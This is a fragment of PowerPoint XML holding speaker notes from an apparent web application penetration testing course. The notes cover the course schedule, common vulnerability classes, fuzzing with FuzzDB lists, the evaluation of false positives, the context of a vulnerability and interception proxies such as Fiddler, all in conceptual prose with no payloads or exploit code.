            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>On Day 4, we will continue our discovery focusing on client side components such as Flash and Java.  We will also explore the client-side scripting in use within our applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>On Day 5, we will launch the attacks that we planned and created during the previous three sections. We will also cover the next steps for students and where they should go from here.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>On Day 6, we will be performing a web application pen-test within a capture the flag event.</a:t>
            </a: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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="230403" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Now that we have covered automated testing, we will start exploring manual methods for discovering flaws.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Here is a list of common attacks we will be covering:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1262063" lvl="3" indent="-173038">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> Information Leakage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1262063" lvl="3" indent="-173038">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> Username Harvesting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1262063" lvl="3" indent="-173038">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> Command Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1262063" lvl="3" indent="-173038">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1262063" lvl="3" indent="-173038">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> Blind SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1262063" lvl="3" indent="-173038">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> Cross Site Scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1262063" lvl="3" indent="-173038">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> Cross Site Request Forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We will cover the means to discover these vulnerabilities and work toward full blown exploitation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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20</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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="231427" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Now that we have reviewed some of the automated scanners and tool collections, it is time to understand and explore the various types of flaws in applications.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We also need to understand methods for manually verify that the flaw exists and examine how to exploit it.  This reduces false positives, which ruin reports and gives us a better understanding of the risks these flaws bring to the application.</a:t>
            </a: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21</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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="232451" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Fuzzing is a technique used throughout all the various types of security testing.  It is used to quickly assess the various input points looking for interesting results, interesting to testers of course. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:sym typeface="Wingdings" charset="0"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
              <a:sym typeface="Wingdings" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:sym typeface="Wingdings" charset="0"/>
              </a:rPr>
              <a:t>To perform a fuzzing attack, we would choose the various input points and send random or psuedo-random strings at the application.  Once the inputs are all sent, we would look at the results to determine if we have any interesting results.  For example, we could send various SQL strings and look for database error messages in the result set.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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22</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page intentionally left blank.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CE86D591-EB46-49C9-B58B-417466F1609D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32424339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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="233475" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Since we need a series of attack strings to perform fuzzing attacks and tests.  Of course we can build our own lists, but there is a prebuilt series of lists at the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>FuzzDB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> project.  This project, available at http://code.google.com/p/fuzzdb, has a series of lists for our use.  These lists are categorized based on what the target is, and we can then use these within whatever tool we are using.</a:t>
            </a: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24</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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="234499" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>As we perform our testing, both manual and automated, we need to evaluate the results.  This helps us determine if the finding is a false positive or a real problem within the application.  This evaluation is based on both the result obtained and the input sent in.  For example, if we sent in a XSS attack string, we would expect to see if echoed back the same way if the application was vulnerable to XSS.  Of course this also means that we need to understand what the flaw actually means and what we would be looking for!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>One example that commonly shows as a false positive is the phpinfo function within PHP applications.  Since this function displays to the browser all of the information of the server's configuration, we see results saying it is vulnerable to SQL injection.  This is due to the test tools looking for database errors and seeing the database drivers listed on the page. Since they don't understand context, as we should, they do not realize the driver names are not part of an error message.</a:t>
            </a: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25</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Application context is one that many people miss.  They focus on testing for vulnerabilities but forget that the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> application is important.  We have to remember that this testing and the running of this application are not within a void.  This is made more difficult to remember since so often we are tasked to test a single application, ignoring all of the pieces and systems that reside within the target network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>One of the main purposes of a penetration test is to understand the risk.  To accomplish this, we have to ask ourselves a series of questions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="688975" lvl="1" indent="-206375">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What does this application do? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="688975" lvl="1" indent="-206375">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Where is it on the network? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="688975" lvl="1" indent="-206375">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Who has access to it?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>By answering these questions, we can then better understand where our testing and the flaws uncovered will take us.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CE86D591-EB46-49C9-B58B-417466F1609D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1025542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category</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> is the context of the vulnerability.  We are the testers have to understand what this context is as it controls what we do with it.  There are two parts to this context.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>First we have to understand a series of questions regarding the vulnerability.  We need to understand if this vulnerability is focused on the server portion of the application or the client running it.  Related to this is understanding where it runs.  For example, if it's SQL injection, it will run within the database but if it is command injection, it runs on the web application server.  This affects how we will then exploit this due to where it runs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Finally we need to pick the right tools and techniques to discover the potential flaw and then exploit it.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CE86D591-EB46-49C9-B58B-417466F1609D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22625128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exploit itself</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> is part of the context we are looking at when we evaluate the vulnerability.  Where it runs will affect how we exploit it and what the payload is.  This execution is where we have to pay attention to ensure that we are not lulled into thinking a flaw doesn't exist because we messed up its exploitation.  This attention needs to take into account which type of flaw it is.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>First, we need to think about server-side flaws.  Keep in mind that the exploit will be running within the processing of the application.  This means that there will be remnants of the code and logic to take into account.  For example, if we are running SQL injection, we have to ensure that our injection runs within the context of the existing query.  This is harder to do since we can't examine the processing on the server typically.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>For client-side flaws this is easier because we can see where our exploit lands.  But we need to pay attention.  For example, if we are attacking a cross site scripting flaw, where does our payload appear in the client-side code?  If it's within another tag, our exploit has to finish that tag.</a:t>
            </a:r>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CE86D591-EB46-49C9-B58B-417466F1609D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40749975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p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182275" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We will now</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> explore various interception proxies commonly used in penetration testing.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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29</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p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="180227" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The discovery phase is the third step in our attack process, following after reconnaissance and mapping.  It builds upon the first two and then becomes the groundwork for the final phase, exploitation.  Today we are focusing on server-side vulnerabilities and how to find them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>When</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> we look at penetration testing of web applications, interception of the traffic is one of our main goals.  This allows us to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" baseline="0" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>get into</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" baseline="0" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> the traffic between the server and the client.  We are able to then capture that traffic and in most cases modify it to test the security of the application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" i="0" baseline="0" dirty="0">
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRP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30</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63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r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>There</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> are two basic methods to intercept traffic.  The first is via a sniffer.  The network sniffer can capture the traffic for us to analyze and will capture all traffic on a network interface or what ever traffic we specify via a filter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0">
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>The main method we use though is an interception proxy.  This type of tool actually acts as a proxy to the application (often a browser) and the tester is able to see, change and resubmit the traffic the browser/user was sending to the application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0">
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>We do find that HTTPS can cause issues for our testing.  For example, our sniffer won't be able to decrypt the traffic, unless we have the key.  We also have certificate errors in the browser if we don't trust the certificate.  We need to configure our browser to accept the certifying authority from our interception proxy.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRP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31</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p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182275" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Fiddler is a Windows based interception proxy.</a:t>
            </a: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32</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560888"/>
            <a:ext cx="5943600" cy="4354512"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fiddler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> is a web debugging proxy used to intercept http(s) traffic between your computer and the web server.  It is a free tool which was purchased by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>Telerik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> in September of 2012.  Fiddler runs on Microsoft Windows.  Fiddler supports plugins, which can be very useful during assessments. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Watcher is a web security testing tool and passive vulnerability scanner plug-in for fiddler.  It looks for cookie settings, SSL configuration, information leaks, and other issues with web applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>ViewStateViewer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> is an plug-in used to view and manipulate the view state.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>x5s  is a fiddler plug-in that is used to test encodings and character transformations to find XSS locations.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>References:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Fiddler - http://www.fiddler2.com/fiddler2/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Watcher - http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>websecuritytool.codeplex.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>ViewStateViewer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> plug-in - http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>labs.neohapsis.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>/2009/08/03/viewstateviewer-a-gui-tool-for-deserializingreserializing-viewstate/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>x5s - http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>xss.codeplex.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CE86D591-EB46-49C9-B58B-417466F1609D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20382613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can see in this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> screenshot, Fiddler has a number of pieces to the interface.  On the left we see all of the requests that fiddler was able to capture. When we select one, we see the request and the response on the right side, if we have selected the </a:t>
            </a:r>
            <a:r>
